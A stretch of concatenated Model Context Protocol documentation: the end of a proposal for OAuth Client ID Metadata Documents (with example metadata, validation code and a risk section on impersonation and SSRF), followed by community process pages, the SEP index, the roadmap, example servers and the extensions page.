* `redirect_uris`: array of allowed redirect URIs
* `token_endpoint_auth_method`: "none" for public clients
Note that a client can use `private_key_jwt` as its `token_endpoint_auth_method`, since the client metadata document can provide public key information.
### Server Requirements
* Servers SHOULD fetch metadata documents when encountering URL-formatted client\_ids
* Servers MUST validate the fetched document contains matching client\_id
* Servers SHOULD cache metadata respecting HTTP headers (max 24 hours recommended)
* Servers MUST validate redirect URIs match those in metadata document
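A minimal sketch of these server-side checks, assuming the `httpx` library (caching, response-size limits, and the SSRF guards discussed later are omitted):

```python theme={null}
import httpx

async def fetch_and_validate_client_metadata(client_id: str, redirect_uri: str) -> dict:
    """Fetch a URL-formatted client_id and apply the checks above."""
    url = httpx.URL(client_id)
    if url.scheme != "https" or url.path in ("", "/"):
        raise ValueError("client_id must be an https URL with a path component")

    async with httpx.AsyncClient(timeout=5.0) as http:
        resp = await http.get(url)
        resp.raise_for_status()
        metadata = resp.json()

    # The document must declare the exact URL it was fetched from
    if metadata.get("client_id") != client_id:
        raise ValueError("client_id in metadata does not match the document URL")

    # The redirect_uri from the authorization request must be pre-registered
    if redirect_uri not in metadata.get("redirect_uris", []):
        raise ValueError("redirect_uri is not in the metadata document")

    return metadata
```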
### Discovery
* Servers advertise support via OAuth metadata: `client_id_metadata_document_supported: true`
* Clients detect support and can fall back to DCR or pre-registration if unavailable
Example metadata document:
```json theme={null}
{
"client_id": "https://app.example.com/oauth/client-metadata.json",
"client_name": "Example MCP Client",
"client_uri": "https://app.example.com",
"logo_uri": "https://app.example.com/logo.png",
"redirect_uris": [
"http://127.0.0.1:3000/callback",
"http://localhost:3000/callback"
],
"grant_types": ["authorization_code"],
"response_types": ["code"],
"token_endpoint_auth_method": "none"
}
```
### Integration with Existing MCP Auth
This proposal adds Client ID Metadata Documents as a third registration option alongside pre-registration and DCR. Servers MAY support any combination of these approaches:
* Pre-registration remains unchanged
* DCR remains unchanged
* Client ID Metadata Documents are detected by URL-formatted client\_ids, and server support is advertised in OAuth metadata.
## Rationale
### Why This Solves the "No Pre-existing Relationship" Problem
Unlike pre-registration which requires coordination, or DCR which requires servers to manage a registration database, Client ID Metadata Documents provide:
1. **Verifiable Identity**: The HTTPS URL serves as both identifier and trust anchor
2. **No Coordination Needed**: Clients publish metadata, servers consume it
3. **Flexible Trust Policies**: Servers decide their own trust criteria without requiring client changes
4. **Stable Identifiers**: Unlike DCR's ephemeral IDs, URLs are stable and auditable
### Redirect URI Attestation
A key benefit of Client ID Metadata Documents is attestation of redirect URIs:
1. **The metadata document cryptographically binds redirect URIs to the client identity** via HTTPS
2. **Servers can trust that redirect URIs in the metadata are controlled by the client** - not attacker-supplied
3. **This prevents redirect URI manipulation attacks** common with self-asserted registration
### Risks of this approach
#### Risk: Localhost URL Impersonation
A limitation of Client ID Metadata Documents is that they cannot, by themselves, prevent localhost URL impersonation. An attacker can claim to be any client by:
1. Providing the legitimate client's metadata URL as their client\_id
2. Binding to the same localhost port the legitimate client uses
3. Intercepting the authorization code when the user approves
This attack is concerning because the server sees the correct metadata document and the user sees the correct client name, making detection difficult.
Platform-specific attestations (iOS DeviceCheck, Android Play Integrity) could address this, but they are not universally available. This would work by the client developer running a backend service that consumes the DeviceCheck / Play Integrity signatures and returns a JWT usable as the `private_key_jwt` authentication for the `token_endpoint_auth_method`.
A similar approach that does not require platform-specific attestations, yet still raises the cost of the attack, is possible using JWKS and short-lived JWTs signed by a server-side component hosted by the client developer. This component could use attestation mechanisms other than platform-specific ones, such as the client's standard login flow, to attest to the client's identity. Using short-lived JWTs reduces the risk of credential compromise and replay, but does not eliminate it entirely: an attacker could still proxy requests to the legitimate client's signing endpoint.
Fully mitigating this risk is outside the scope of this proposal. This proposal has the same risks as DCR does in a localhost redirect scenario.
Servers SHOULD display additional warnings for localhost-only clients.
#### Risk: Server Side Request Forgery (SSRF)
The authorization server takes a URL as input from an unknown client, and then fetches that URL. A malicious client could use this to send non-metadata requests on behalf of the authorization server. An example would be sending a URL corresponding to a private administration endpoint that the authorization server has access to.
This can be prevented by validating the URLs, and the IPs those URLs resolve to, prior to initiating a fetch request.
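As a rough sketch of such a guard, using only the standard library (note that, to resist DNS rebinding, the validated addresses must also be pinned for the actual fetch rather than resolved a second time):

```python theme={null}
import ipaddress
import socket
from urllib.parse import urlparse

def assert_safe_to_fetch(url: str) -> None:
    """Reject URLs that resolve to private or otherwise non-global
    addresses before fetching a client metadata document."""
    parsed = urlparse(url)
    if parsed.scheme != "https" or not parsed.hostname:
        raise ValueError("only https URLs with a hostname are allowed")

    for info in socket.getaddrinfo(parsed.hostname, 443):
        ip = ipaddress.ip_address(info[4][0])
        if not ip.is_global:
            raise ValueError(f"{parsed.hostname} resolves to non-global address {ip}")
```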
#### Risk: Distributed Denial of Service (DDoS)
Similarly, an attacker could try to leverage a pool of authorization servers to perform a denial of service attack on a non-MCP server.
There is no additional amplification in the fetch request (the bandwidth the client spends making the request roughly equals the bandwidth of the request sent to the target server), and each authorization server can aggressively cache the results of these metadata fetches, so this is unlikely to be an attractive DDoS vector.
#### Risk: Maturity of referenced specification
The RFC for Client ID Metadata Documents is still a draft. It has been implemented by Bluesky, but it has not been ratified, is not yet widely adopted outside of that platform, and may evolve over time. Our intention is to align with subsequent drafts and any final standard, while minimizing disruption and breakage for existing implementations.
This approach carries the risk of implementation challenges or protocol flaws that have not surfaced yet. However, even though DCR has been ratified, it too has a number of implementation challenges that developers face when trying to use it in an open ecosystem context like MCP. Those challenges are the motivation behind this proposal.
#### Risk: Client implementation burden, especially for local clients
This specification requires an additional piece of infrastructure for clients, since they need to host a metadata file behind an HTTPS URL. Without this requirement, a client could be, for example, strictly a desktop application.
The burden of hosting this endpoint is expected to be low, since hosting a static JSON file is straightforward and most known clients already have a webpage advertising the client or providing download links.
#### Risk: Fragmentation of authorization approaches
Authorization for MCP is already challenging to fully implement for clients and servers; questions about how to do it correctly and what the best practices are rank among the most common in the community. Adding another branch to the authorization flow could make it even more complicated and fractured, so that fewer developers succeed in following the specification, and the promise of compatibility and an open ecosystem suffers as a result.
This proposal intends to simplify the story for authorization server and resource server developers by providing a clearer mechanism for trusting redirect URIs and less operational overhead. It depends on that simplicity being clearly the better option for most developers, which would drive adoption and make this the most widely supported option. If we do not believe it is clearly the better option, then we should not adopt this proposal.
This proposal also provides a unified mechanism for both open servers and servers that want to restrict which clients can be used. Alternatives to this proposal require that clients and servers implement different mechanisms for the open and protected use cases.
## Alternatives Considered
1. **Enhanced DCR with Software Statements**: More complex, requires JWKS hosting and JWT signing
2. **Mandatory Pre-registration**: Poor developer and user experience for MCP's distributed ecosystem
3. **Mutual TLS**: Requires trusting a client certificate authority, impractical in an open ecosystem
4. **Status Quo**: Continues current pain points for server implementers
Client ID Metadata Documents are a strict improvement over DCR for the most common open-ecosystem use case, and they can be extended in the future to better support things like OS-level attestations and `jwks_uri` values.
## Backward Compatibility
This proposal is fully backward compatible:
* Existing pre-registered clients continue working unchanged
* Existing DCR implementations continue working unchanged
* Servers can adopt Client ID Metadata Documents incrementally
* Clients can detect support and fall back to other methods
## Prototype Implementation
A prototype implementation is available [here](https://github.com/modelcontextprotocol/typescript-sdk/pull/839) demonstrating:
1. Client-side metadata document hosting
2. Server-side metadata fetching and validation
3. Integration with existing MCP OAuth flows
4. Proper error handling and fallback behavior
## Security Implications
1. **Phishing Prevention**: Display client hostname prominently
2. **SSRF Protection**: Validate URLs, limit response size, timeout requests, rate limit outbound requests
### Best Practices
* Only fetch client metadata after authenticating the user
* Implement rate limiting on outbound metadata fetches
* Consider additional warnings for new/unknown/localhost domains
* Log metadata fetch failures for monitoring
## References
* [draft-parecki-oauth-client-id-metadata-document-03](https://www.ietf.org/archive/id/draft-parecki-oauth-client-id-metadata-document-03.txt)
* [OAuth 2.1](https://datatracker.ietf.org/doc/draft-ietf-oauth-v2-1/)
* [RFC 7591 - OAuth 2.0 Dynamic Client Registration](https://www.rfc-editor.org/rfc/rfc7591.html)
* [MCP Specification - Authorization](https://modelcontextprotocol.org/docs/spec/authorization)
* [Evolving OAuth Client Registration in the Model Context Protocol](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1027/)
# SEP-994: Shared Communication Practices/Guidelines
Source: https://modelcontextprotocol.io/community/seps/994-shared-communication-practicesguidelines
Shared Communication Practices/Guidelines
Final
Process
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 994 |
| **Title** | Shared Communication Practices/Guidelines |
| **Status** | Final |
| **Type** | Process |
| **Created** | 2025-07-17 |
| **Author(s)** | [@localden](https://github.com/localden) |
| **Sponsor** | None |
| **PR** | [#1002](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1002) |
***
## Abstract
This SEP establishes the communication strategy and framework for the Model Context Protocol community. It defines the official channels for contributor communication, guidelines for their use, and processes for decision documentation.
## Motivation
As the MCP community grows, clear communication guidelines are essential for:
* **Consistency**: Ensuring all contributors know where and how to communicate
* **Transparency**: Making project decisions visible and accessible
* **Efficiency**: Directing discussions to the most appropriate channels
* **Security**: Establishing proper processes for handling sensitive issues
## Specification
### Communication Channels
The MCP project uses three primary communication channels:
1. **Discord**: For real-time or ad-hoc discussions among contributors
2. **GitHub Discussions**: For structured, longer-form discussions
3. **GitHub Issues**: For actionable tasks, bug reports, and feature requests
Security-sensitive issues follow a separate process defined in SECURITY.md.
### Discord Guidelines
The Discord server is designed for **MCP contributors** and is not intended for general MCP support.
#### Public Channels (Default)
* Open community engagement and collaborative development
* SDK and tooling development discussions
* Working and Interest Group discussions
* Community onboarding and contribution guidance
* Office hours and maintainer availability
#### Private Channels (Exceptions)
Private channels are reserved for:
* Security incidents (CVEs, protocol vulnerabilities)
* People matters (maintainer discussions, code of conduct)
* Coordination requiring immediate focused response
All technical and governance decisions must be documented publicly in GitHub.
### GitHub Discussions
Used for structured, long-form discussion:
* Project roadmap planning
* Announcements and release communications
* Community polls and consensus-building
* Feature requests with context and rationale
### GitHub Issues
Used for actionable items:
* Bug reports with reproducible steps
* Documentation improvements
* CI/CD and infrastructure issues
* Release tasks and milestone tracking
### Decision Records
All MCP decisions are documented publicly:
* **Technical decisions**: GitHub Issues and SEPs
* **Specification changes**: Changelog on the MCP website
* **Process changes**: Community documentation
* **Governance decisions**: GitHub Issues and SEPs
Decision documentation includes:
* Decision makers
* Background context and motivation
* Options considered
* Rationale for chosen approach
* Implementation steps
## Rationale
This framework balances openness with practicality:
* **Public by default**: Maximizes transparency and community participation
* **Private when necessary**: Protects security and personal matters
* **Channel separation**: Keeps discussions organized and searchable
* **Documentation requirements**: Ensures decisions are preserved and discoverable
## Backward Compatibility
This SEP establishes new processes and does not affect existing protocol functionality.
## Reference Implementation
The communication guidelines are published at: [https://modelcontextprotocol.io/community/communication](https://modelcontextprotocol.io/community/communication)
# Specification Enhancement Proposals (SEPs)
Source: https://modelcontextprotocol.io/community/seps/index
Index of all MCP Specification Enhancement Proposals
Specification Enhancement Proposals (SEPs) are the primary mechanism for proposing major changes to the Model Context Protocol. Each SEP provides a concise technical specification and rationale for proposed features.
Learn how to submit your own Specification Enhancement Proposal
## Summary
* **Final**: 24
## All SEPs
| SEP | Title | Status | Type | Created |
| ----------------------------------------------------------------------------------- | ----------------------------------------------------------------------------- | -------------------- | ---------------- | ---------- |
| [SEP-2133](/community/seps/2133-extensions) | Extensions | Final | Standards Track | 2025-01-21 |
| [SEP-2085](/community/seps/2085-governance-succession-and-amendment) | Governance Succession and Amendment Procedures | Final | Process | 2025-12-05 |
| [SEP-1865](/community/seps/1865-mcp-apps-interactive-user-interfaces-for-mcp) | MCP Apps - Interactive User Interfaces for MCP | Final | Extensions Track | 2025-11-21 |
| [SEP-1850](/community/seps/1850-pr-based-sep-workflow) | PR-Based SEP Workflow | Final | Process | 2025-11-20 |
| [SEP-1730](/community/seps/1730-sdks-tiering-system) | SDKs Tiering System | Final | Standards Track | 2025-10-29 |
| [SEP-1699](/community/seps/1699-support-sse-polling-via-server-side-disconnect) | Support SSE polling via server-side disconnect | Final | Standards Track | 2025-10-22 |
| [SEP-1686](/community/seps/1686-tasks) | Tasks | Final | Standards Track | 2025-10-20 |
| [SEP-1613](/community/seps/1613-establish-json-schema-2020-12-as-default-dialect-f) | Establish JSON Schema 2020-12 as Default Dialect for MCP | Final | Standards Track | 2025-10-06 |
| [SEP-1577](/community/seps/1577--sampling-with-tools) | Sampling With Tools | Final | Standards Track | 2025-09-30 |
| [SEP-1330](/community/seps/1330-elicitation-enum-schema-improvements-and-standards) | Elicitation Enum Schema Improvements and Standards Compliance | Final | Standards Track | 2025-08-11 |
| [SEP-1319](/community/seps/1319-decouple-request-payload-from-rpc-methods-definiti) | Decouple Request Payload from RPC Methods Definition | Final | Standards Track | 2025-08-08 |
| [SEP-1303](/community/seps/1303-input-validation-errors-as-tool-execution-errors) | Input Validation Errors as Tool Execution Errors | Final | Standards Track | 2025-08-05 |
| [SEP-1302](/community/seps/1302-formalize-working-groups-and-interest-groups-in-mc) | Formalize Working Groups and Interest Groups in MCP Governance | Final | Standards Track | 2025-08-05 |
| [SEP-1046](/community/seps/1046-support-oauth-client-credentials-flow-in-authoriza) | Support OAuth client credentials flow in authorization | Final | Standards Track | 2025-07-23 |
| [SEP-1036](/community/seps/1036-url-mode-elicitation-for-secure-out-of-band-intera) | URL Mode Elicitation for secure out-of-band interactions | Final | Standards Track | 2025-07-22 |
| [SEP-1034](/community/seps/1034--support-default-values-for-all-primitive-types-in) | Support default values for all primitive types in elicitation schemas | Final | Standards Track | 2025-07-22 |
| [SEP-1024](/community/seps/1024-mcp-client-security-requirements-for-local-server-) | MCP Client Security Requirements for Local Server Installation | Final | Standards Track | 2025-07-22 |
| [SEP-994](/community/seps/994-shared-communication-practicesguidelines) | Shared Communication Practices/Guidelines | Final | Process | 2025-07-17 |
| [SEP-991](/community/seps/991-enable-url-based-client-registration-using-oauth-c) | Enable URL-based Client Registration using OAuth Client ID Metadata Documents | Final | Standards Track | 2025-07-07 |
| [SEP-990](/community/seps/990-enable-enterprise-idp-policy-controls-during-mcp-o) | Enable enterprise IdP policy controls during MCP OAuth flows | Final | Standards Track | 2025-06-04 |
| [SEP-986](/community/seps/986-specify-format-for-tool-names) | Specify Format for Tool Names | Final | Standards Track | 2025-07-16 |
| [SEP-985](/community/seps/985-align-oauth-20-protected-resource-metadata-with-rf) | Align OAuth 2.0 Protected Resource Metadata with RFC 9728 | Final | Standards Track | 2025-07-16 |
| [SEP-973](/community/seps/973-expose-additional-metadata-for-implementations-res) | Expose additional metadata for Implementations, Resources, Tools and Prompts | Final | Standards Track | 2025-07-15 |
| [SEP-932](/community/seps/932-model-context-protocol-governance) | Model Context Protocol Governance | Final | Process | 2025-07-08 |
## SEP Status Definitions
| Status | Definition |
| ------------------------- | -------------------------------------------------------- |
| Draft | SEP proposal with a sponsor, undergoing informal review |
| In-Review | SEP proposal ready for formal review by Core Maintainers |
| Accepted | SEP accepted, awaiting reference implementation |
| Final | SEP finalized with reference implementation complete |
| Rejected | SEP rejected by Core Maintainers |
| Withdrawn | SEP withdrawn by the author |
| Superseded | SEP replaced by a newer SEP |
| Dormant | SEP without a sponsor, closed after 6 months |
# Working and Interest Groups
Source: https://modelcontextprotocol.io/community/working-interest-groups
Learn about the two forms of collaborative groups within the Model Context Protocol's governance structure - Working Groups and Interest Groups.
Within the MCP contributor community we maintain two types of collaboration formats: **Interest Groups (IGs)** and **Working Groups (WGs)**.
## Quick Reference
| | Interest Group (IG) | Working Group (WG) |
| -------------- | -------------------------------------------------- | ------------------------------------------------------ |
| **Purpose** | Identify and discuss problems | Build concrete solutions |
| **Output** | Problem statements, use cases, recommendations | SEPs, implementations, code |
| **Commitment** | Casual participation welcome | Active contribution expected |
| **Duration** | Ongoing as long as topic is relevant | Until deliverables complete |
| **Example** | "Security in MCP" - discussing security challenges | "Server Identity" - implementing identity verification |
## When to Use Which
**Join an Interest Group when you:**
* Have a problem but aren't sure of the solution
* Want to explore whether an idea has community support
* Are new to MCP and want to learn about a topic area
* Want to share use cases and requirements
**Join a Working Group when you:**
* Have a specific solution to implement
* Are ready to write code or a SEP
* Can commit regular time to active development
* Want to help build a particular feature
**Typical flow**: Discuss a problem in an IG → Validate that it's worth solving → Form or join a WG to build the solution → Submit a SEP → Implement
## Interest Groups (IGs)
**Goal:** Facilitate discussion and knowledge-sharing among MCP contributors who share interests in a specific topic. The focus is on identifying problems worth solving and gathering requirements.
### What IGs Do
* Host discussions in Discord channels
* Run regular meetings to share use cases
* Document problem statements and requirements
* Build consensus on what should be prioritized
* Provide input to Working Groups and SEPs
### Expectations
* Regular conversations in the IG's Discord channel
* **AND/OR** recurring live meetings attended by IG members
* Meeting dates published on the [MCP community calendar](https://meet.modelcontextprotocol.io/) with the IG channel name (e.g., `auth-ig`)
* Notes publicly shared after meetings as a [GitHub issue](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1629) or public Google Doc
### Examples of Interest Groups
* Security in MCP
* Auth in MCP
* Using MCP in enterprise settings
* Tooling and practices for hosting MCP servers
* Tooling and practices for implementing MCP clients
### Creating an Interest Group
1. Fill out the creation template in the `#wg-ig-group-creation` channel on [Discord](https://discord.gg/6CSzBmMkjX)
2. A community moderator will review and call for a vote in `#community-moderators` (72h period, majority approval)
3. Once approved, the Facilitator(s) organize the IG per the expectations above
**Creation Template:**
* Facilitator(s)
* Maintainer(s) (optional - an official MCP Steering Group representative)
* Related IGs with potentially similar goals
* How this IG differentiates itself from related IGs
* First topic to discuss within the IG
### IG Lifecycle
* **No time limit** - Successful IGs remain active as long as they're maintained
* **Retirement** - Community moderators or Core/Lead Maintainers may retire an IG that's no longer active or needed
## Working Groups (WGs)
**Goal:** Collaborate on a SEP, a series of related SEPs, or an officially endorsed project. WGs produce concrete deliverables.
### What WGs Do
* Write and iterate on SEPs
* Build reference implementations
* Maintain ongoing projects (Inspector, Registry, SDKs)
* Drive features from proposal to specification
### Expectations
* Meaningful progress towards at least one SEP or implementation **OR** maintenance responsibilities for a project
* Facilitators keep track of progress and communicate status
* Meeting dates published on the [MCP community calendar](https://meet.modelcontextprotocol.io/) with the WG channel name (e.g., `agents-wg`)
* Notes publicly shared after meetings
### Examples of Working Groups
* Registry
* Inspector
* Tool Filtering
* Server Identity
### Creating a Working Group
1. Fill out the creation template in `#wg-ig-group-creation` on [Discord](https://discord.gg/6CSzBmMkjX)
2. Community moderator reviews and calls for vote (72h period, majority approval)
3. Facilitator(s) organize the WG per expectations
**Creation Template:**
* Facilitator(s)
* Maintainer(s) (optional)
* Explanation of interest/use cases (IG discussion helps but isn't required)
* First Issue/PR/SEP the WG will work on
### WG Lifecycle
* **Active** - WG has ongoing work and regular participation
* **Retirement** - WG is retired when:
* Community moderators or Core/Lead Maintainers determine it's no longer active
* The WG has no active Issue/PR for a month or has completed all planned work
## Facilitators
A **Facilitator** is an informal role anyone can self-nominate for. Facilitators:
* Shepherd discussions and collaboration
* Schedule and run meetings
* Ensure notes are published
* Keep the group on track
Being a Facilitator does **not** grant [maintainership](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md) in the MCP organization. Lead and Core Maintainers may modify the list of Facilitators for any WG/IG at any time.
## Meeting Calendar
All IG and WG meetings are published on the public MCP community calendar at [meet.modelcontextprotocol.io](https://meet.modelcontextprotocol.io/).
Facilitators are responsible for posting meeting schedules in advance to enable broader participation.
## FAQ
### How do I get involved contributing to MCP?
These groups provide an on-ramp:
1. [Join Discord](https://discord.gg/6CSzBmMkjX) and follow IGs relevant to you. Attend [live calls](https://meet.modelcontextprotocol.io/). Participate in discussions.
2. Offer to facilitate calls. Share your use cases in SEP discussions.
3. When ready for hands-on work, contribute to WG deliverables.
4. Active contributors may be nominated by WG maintainers as new maintainers.
### Where can I find a list of all current WGs and IGs?
On the [MCP Contributor Discord](https://discord.gg/6CSzBmMkjX), there is a section of channels for each Working and Interest Group.
### Do I need to join an IG before starting a WG?
No. IG participation can help validate ideas and build support, but it's not required. You can start a WG directly if you have a clear deliverable in mind.
### Do I need to be in a WG to submit a SEP?
No. Anyone can submit a SEP. However, WG collaboration can strengthen your proposal and increase its chances of success.
### What if my IG discussion leads to a concrete solution?
Great! You can either:
* Form a new WG to build the solution
* Join an existing WG if one covers the area
* Submit a SEP directly if the solution is well-defined
### Can one person be in multiple IGs/WGs?
Yes. Participate in as many groups as your time allows.
# Roadmap
Source: https://modelcontextprotocol.io/development/roadmap
Our plans for evolving Model Context Protocol
Last updated: **2025-10-31**
The Model Context Protocol is rapidly evolving. This page outlines our priorities for **the next release on November 25th, 2025**, with a release candidate available on November 11th, 2025. To see what's changing in the upcoming release, check out the **[specification changelog](/specification/draft/changelog/)**.
For more context on our release timeline and governance process, read our [blog post on the next version update](https://blog.modelcontextprotocol.io/posts/2025-09-26-mcp-next-version-update/).
The ideas presented here are not commitments—we may solve these challenges differently than described, or some may not materialize at all. This is also not an *exhaustive* list; we may incorporate work that isn't mentioned here.
We value community participation! Each section links to relevant discussions where you can learn more and contribute your thoughts.
For a technical view of our standardization process, visit the [Standards Track](https://github.com/orgs/modelcontextprotocol/projects/2/views/2) on GitHub, which tracks how proposals progress toward inclusion in the official [MCP specification](https://modelcontextprotocol.io/specification/).
## Priority Areas for the Next Release
### Asynchronous Operations
Currently, MCP is built around mostly synchronous operations. We're adding async support to allow servers to kick off long-running tasks while clients can check back later for results. This will enable operations that take minutes or hours without blocking.
Follow the progress in [SEP-1686](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1686).
### Statelessness and Scalability
As organizations deploy MCP servers at enterprise scale, we're addressing challenges around horizontal scaling. While [Streamable HTTP](https://modelcontextprotocol.io/specification/2025-03-26/basic/transports#streamable-http) provides some stateless support, we're smoothing out rough edges around server startup and session handling to make it easier to run MCP servers in production.
The current focus point for this effort is [SEP-1442](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1442).
### Server Identity
We're enabling servers to advertise themselves through [`.well-known` URLs](https://en.wikipedia.org/wiki/Well-known_URI)—an established standard for providing metadata. This will allow clients to discover what a server can do without having to connect to it first, making discovery much more intuitive and enabling systems like our registry to automatically catalog capabilities. We are working closely with multiple projects across the industry to converge on a common standard for agent cards.
### Official Extensions
As MCP has grown, valuable patterns have emerged for specific industries and use cases. Rather than leaving everyone to reinvent the wheel, we're officially recognizing and documenting the most popular protocol extensions. This curated collection will give developers building for specialized domains like healthcare, finance, or education a solid starting point.
### SDK Support Standardization
We're introducing a clear tiering system for SDKs based on factors like specification compliance speed, maintenance responsiveness, and feature completeness. This will help developers understand exactly what level of support they're getting before committing to a dependency.
### MCP Registry General Availability
The [MCP Registry](https://github.com/modelcontextprotocol/registry) launched in preview in September 2025 and is progressing toward general availability. We're stabilizing the v0.1 API through real-world integrations and community feedback, with plans to transition from preview to a production-ready service. This will provide developers with a reliable, community-driven platform for discovering and sharing MCP servers.
## Validation
To foster a robust developer ecosystem, we plan to invest in:
* **Reference Client Implementations**: demonstrating protocol features with high-quality AI applications
* **Reference Server Implementation**: showcasing authentication patterns and remote deployment best practices
* **Compliance Test Suites**: automated verification that clients, servers, and SDKs properly implement the specification
These tools will help developers confidently implement MCP while ensuring consistent behavior across the ecosystem.
## Get Involved
We welcome your contributions to MCP's future! Join our [GitHub Discussions](https://github.com/orgs/modelcontextprotocol/discussions) to share ideas, provide feedback, or participate in the development process.
# Example Servers
Source: https://modelcontextprotocol.io/examples
A list of example servers and implementations
This page showcases various Model Context Protocol (MCP) servers that demonstrate the protocol's capabilities and versatility. These servers enable Large Language Models (LLMs) to securely access tools and data sources.
## Reference implementations
These official reference servers demonstrate core MCP features and SDK usage:
### Current reference servers
* **[Everything](https://github.com/modelcontextprotocol/servers/tree/main/src/everything)** - Reference / test server with prompts, resources, and tools
* **[Fetch](https://github.com/modelcontextprotocol/servers/tree/main/src/fetch)** - Web content fetching and conversion for efficient LLM usage
* **[Filesystem](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem)** - Secure file operations with configurable access controls
* **[Git](https://github.com/modelcontextprotocol/servers/tree/main/src/git)** - Tools to read, search, and manipulate Git repositories
* **[Memory](https://github.com/modelcontextprotocol/servers/tree/main/src/memory)** - Knowledge graph-based persistent memory system
* **[Sequential Thinking](https://github.com/modelcontextprotocol/servers/tree/main/src/sequentialthinking)** - Dynamic and reflective problem-solving through thought sequences
* **[Time](https://github.com/modelcontextprotocol/servers/tree/main/src/time)** - Time and timezone conversion capabilities
### Additional example servers (archived)
Visit the [servers-archived repository](https://github.com/modelcontextprotocol/servers-archived) to get access to archived example servers that are no longer actively maintained.
They are provided for historical reference only.
## Official integrations
Visit the [MCP Servers Repository (Official Integrations section)](https://github.com/modelcontextprotocol/servers?tab=readme-ov-file#%EF%B8%8F-official-integrations) for a list of MCP servers maintained by companies for their platforms.
## Community implementations
Visit the [MCP Servers Repository (Community section)](https://github.com/modelcontextprotocol/servers?tab=readme-ov-file#-community-servers) for a list of MCP servers maintained by community members.
## Getting started
### Using reference servers
TypeScript-based servers can be used directly with `npx`:
```bash theme={null}
npx -y @modelcontextprotocol/server-memory
```
Python-based servers can be used with `uvx` (recommended) or `pip`:
```bash theme={null}
# Using uvx
uvx mcp-server-git
# Using pip
pip install mcp-server-git
python -m mcp_server_git
```
### Configuring with Claude
To use an MCP server with Claude, add it to your configuration:
```json theme={null}
{
"mcpServers": {
"memory": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-memory"]
},
"filesystem": {
"command": "npx",
"args": [
"-y",
"@modelcontextprotocol/server-filesystem",
"/path/to/allowed/files"
]
},
"github": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-github"],
"env": {
"GITHUB_PERSONAL_ACCESS_TOKEN": ""
}
}
}
}
```
## Additional resources
Visit the [MCP Servers Repository (Resources section)](https://github.com/modelcontextprotocol/servers?tab=readme-ov-file#-resources) for a collection of other resources and projects related to MCP.
Visit our [GitHub Discussions](https://github.com/orgs/modelcontextprotocol/discussions) to engage with the MCP community.
# Extensions
Source: https://modelcontextprotocol.io/extensions
Optional extensions to the Model Context Protocol
# MCP Extensions
MCP extensions are optional additions to the specification that define capabilities beyond the core protocol. Extensions enable functionality that may be modular (e.g., distinct features like authentication), specialized (e.g., industry-specific logic), or experimental (e.g., features being incubated for potential core inclusion).
Extensions are identified using a unique *extension identifier* with the format: `{vendor-prefix}/{extension-name}`, e.g. `io.modelcontextprotocol/oauth-client-credentials`. Official extensions use the `io.modelcontextprotocol` vendor prefix.
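As an illustration, an identifier can be split into its vendor prefix and extension name with a small parser; the exact character grammar below is an assumption, since the text above only fixes the `{vendor-prefix}/{extension-name}` shape:

```python theme={null}
import re

# Assumed grammar: reverse-DNS vendor prefix, slash, kebab-case name,
# e.g. "io.modelcontextprotocol/oauth-client-credentials"
EXTENSION_ID = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+/[a-z0-9-]+$")

def parse_extension_id(identifier: str) -> tuple[str, str]:
    """Split an extension identifier into (vendor_prefix, extension_name)."""
    if not EXTENSION_ID.match(identifier):
        raise ValueError(f"not a valid extension identifier: {identifier}")
    vendor, name = identifier.split("/", 1)
    return vendor, name
```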
## Official Extension Repositories
Official extensions live inside the [MCP GitHub org](https://github.com/modelcontextprotocol/) in repositories with the `ext-` prefix.
### ext-auth
**Repository:** [github.com/modelcontextprotocol/ext-auth](https://github.com/modelcontextprotocol/ext-auth)
Extensions for supplementary authorization mechanisms beyond the core specification.
| Extension | Description | Specification |
| -------------------------------- | -------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------- |
| OAuth Client Credentials | OAuth 2.0 client credentials flow for machine-to-machine authentication | [Link](https://github.com/modelcontextprotocol/ext-auth/blob/main/specification/draft/oauth-client-credentials.mdx) |
| Enterprise-Managed Authorization | Framework for enterprise environments requiring centralized access control | [Link](https://github.com/modelcontextprotocol/ext-auth/blob/main/specification/draft/enterprise-managed-authorization.mdx) |
### ext-apps
**Repository:** [github.com/modelcontextprotocol/ext-apps](https://github.com/modelcontextprotocol/ext-apps)
Extensions for interactive UI elements in conversational MCP clients.
| Extension | Description | Specification |
| --------- | ---------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------- |
| MCP Apps | Allows MCP Servers to display interactive UI elements (charts, forms, video players) inline within conversations | [Link](https://github.com/modelcontextprotocol/ext-apps/blob/main/specification/2026-01-26/apps.mdx) |
## Creating Extensions
The lifecycle for official extensions is similar to a SEP, but delegated to extension repository maintainers:
1. **Propose**: Author creates a SEP in the main MCP repository using the [standard SEP guidelines](/community/sep-guidelines) with type **Extensions Track**.
2. **Review**: Extension SEPs are reviewed by the relevant extension repository maintainers.
3. **Implement**: Extension SEPs **MUST** have at least one reference implementation in an official SDK before being accepted.
4. **Publish**: Once approved, the author produces a PR that introduces the extension to the extension repository.
5. **Adopt**: Approved extensions **MAY** be implemented in additional clients, servers, and SDKs.
### Requirements
* Extension specifications **MUST** use RFC 2119 language (MUST, SHOULD, MAY)
* Extensions **SHOULD** have an associated working group or interest group
### SDK Implementation
SDKs **MAY** implement extensions. Where implemented:
* Extensions **MUST** be disabled by default and require explicit opt-in
* SDK documentation **SHOULD** list supported extensions
* SDK maintainers have full autonomy over which extensions they support
* Extension support is not required for protocol conformance
### Evolution
Extensions evolve independently of the core protocol. Updates to extensions are managed by the extension repository maintainers and do not require core maintainer review.
Extensions **MUST** consider backwards compatibility in their design:
* Extensions **SHOULD** maintain backwards compatibility through capability flags or versioning within the extension settings object, rather than creating a new extension identifier
* When backwards-incompatible changes are unavoidable, a new extension identifier **MUST** be used (e.g., `io.modelcontextprotocol/my-extension-v2`)
# The MCP Registry
Source: https://modelcontextprotocol.io/registry/about
